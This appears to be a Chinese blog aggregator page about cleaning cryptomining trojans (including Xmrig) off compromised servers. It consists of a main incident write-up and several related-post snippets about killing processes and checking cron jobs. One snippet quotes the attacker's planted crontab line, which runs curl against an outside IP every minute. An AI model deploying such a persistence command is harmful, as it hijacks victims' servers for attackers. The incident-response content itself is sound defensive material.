記一次服務器被植入挖礦腳本的解決過程
記一次服務器被植入挖礦腳本的解決過程 刪除挖礦腳本和對應的進程 找出並刪除對應挖礦腳本文件 找出進程pid,並且kill掉 無法kill掉的是原進程的守護進程,原進程不在它也會自動關閉,所以不用管它 kill掉后cpu恢復正常 需要檢查是否有定時任務 防止挖礦腳本重新 ...
原文:記一次服務器被植入挖礦木馬cpu飆升200%解決過程
線上服務器用的是某訊雲的,歡快的完美運行着Tomcat,MySQL,MongoDB,ActiveMQ等程序。突然一則噩耗從前線傳來:網站不能訪問了。 此項目是我負責,我以 的手速立即打開了服務器,看到Tomcat掛了,然后順其自然的重啟,啟動過程中直接被killed,再試試數據庫,同樣沒成功,多次嘗試甚至重啟機器無果。機制的我打了個top,出現以下內容: 這是誰運行的程序 不管三七二十一先殺掉再說 ...
2019-07-26 18:05 0 615 推薦指數:
相關推薦
supsplk 服務器被植入木馬 挖礦 cpu使用 700%
最近emr集群跑任務的時候總出現 task failed ,優化sql,調提交任務參數都沒解決,最后再我排查時候,發現一個從節點的cpu使用800% 經過一些列排查,發現是被注入木馬了, #被人種下的crontab#* * * * * curl -s http://158.69.133.17 ...
服務器被植入挖礦木馬的心酸過程
轉自 https://juejin.im/post/5aa0cc476fb9a028d82b5695最近打開服務變得很慢,然后 CPU,內存占用有達到了100%,打開網站都很慢,這個肯定很反常的,平時cpu不會達到那么高,因此netstat -ntlp 准備看看端口占用是不是有什么異常,有的會看 ...
記一次阿里雲服務器被挖礦程序植入處理(簡單記錄下)
2021年5月1日22點半左右,阿里雲報警發現Webshell文件 五一正放假在外面鬼混呢,想着這服務器也只是自己測試用的,沒啥東西,就沒及時上線處理。 等回家上線才發現服務器卡死了,CPU滿載,后台一頓報警,趕緊上去處理下! 通過top,ps ...
記一次阿里雲被植入挖礦木馬的事件
今天上午同事說我負責的那個模塊不工作了,我登錄了一下阿里雲服務器排查一下,發現服務器運行很慢。(因為你敲的命令字符回傳的很快,但是命令的響應時間長,所以是服務器卡了,而不是網絡的問題) 使用top查看一下,發現: 抱歉,沒有及時截圖,大家將就着看吧,大概就是上圖的樣子,cpu已經 ...
Centos 7.4 服務器 被植入挖礦木馬
背景 最近由於在弄springboot shiro的redis session共享的問題,所以在服務器上部署了redis,因為沒有太多的考慮所以沒有設置密碼。 等到第二天的時候,發現redis外網無法訪問內網可以。 查看端口綁定情況 netstat -antlp | grep 6379 ...
記一次Xmrig挖礦木馬排查過程
問題現象 Linux 服務器收到報警信息,主機 CPU 跑滿。 自動創建運行 Docker 容器 xmrig, 導致其他運行中容器被迫停止。 問題原因 通過 top 命令可以看到有一個 xmrig 進程占用了99%的 CPU。 經定位,該進程是一個挖礦木馬程序,通過上述截圖 ...
記一次Xmrig挖礦木馬排查過程
問題現象 Linux 服務器收到報警信息,主機 CPU 跑滿。 自動創建運行 Docker 容器 xmrig, 導致其他運行中容器被迫停止。 問題原因 通過 top 命令可以看到有一個 xmrig 進程占用了99%的 CPU。 經定位,該進程是一個挖礦 ...